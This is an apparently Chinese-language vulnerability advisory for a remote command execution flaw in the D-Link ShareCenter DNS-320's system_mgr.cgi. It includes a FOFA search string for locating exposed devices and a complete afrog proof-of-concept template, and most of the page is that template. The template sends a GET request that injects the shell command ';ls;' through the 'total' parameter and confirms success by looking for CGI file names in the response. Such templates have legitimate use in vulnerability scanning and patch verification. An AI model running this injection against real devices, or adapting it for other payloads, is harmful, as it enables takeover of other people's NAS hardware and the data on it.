dlink-sharecenter-dns-320-rce: D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞

日期: 2025-08-01 | 影响软件: D-Link ShareCenter DNS-320 | POC: 已公开

漏洞描述

D-Link ShareCenter DNS-320 system_mgr.cgi 存在远程命令执行,攻击者通过漏洞可以控制服务器 fofa: app="D_Link-DNS-ShareCenter"

PoC代码[已公开]

id: dlink-sharecenter-dns-320-rce

info:
  name: D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞
  author: zan8in
  severity: critical
  description: |
    D-Link ShareCenter DNS-320 system_mgr.cgi 存在远程命令执行,攻击者通过漏洞可以控制服务器
    fofa: app="D_Link-DNS-ShareCenter"
  tags: dlink,rce
  created: 2023/08/13

rules:
  r0:
    request:
      method: GET
      path: /cgi-bin/system_mgr.cgi?cmd=cgi_get_log_item&total=;ls;
    expression: response.status == 200 && response.body.bcontains(b'account_mgr.cgi') && response.body.bcontains(b'apkg_mgr.cgi') && response.body.bcontains(b'app_mgr.cgi')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dlink-sharecenter-dns-320-rce.yaml